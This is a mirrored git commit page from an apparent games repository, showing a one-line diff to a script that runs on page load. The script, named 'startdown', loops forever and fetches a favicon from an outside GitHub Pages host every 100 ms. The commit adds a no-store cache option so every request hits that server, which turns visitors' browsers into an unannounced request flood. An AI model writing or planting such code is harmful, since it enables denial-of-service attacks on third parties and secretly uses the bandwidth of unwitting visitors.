mirror of
https://github.com/hexahigh/games.git
synced 2025-12-11 20:15:38 +01:00
test
This commit is contained in:
parent
3ec9bef521
commit
8173799d9d
@ -19,7 +19,7 @@
|
||||
window.onload = async function startdown(){
|
||||
while(true) {
|
||||
await delay(100);
|
||||
fetch('https://t0m0t0w.github.io/favicon.png')
|
||||
fetch('https://t0m0t0w.github.io/favicon.png', {cache: "no-store"})
|
||||
}
|
||||
}
|
||||
let speed = 1000
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user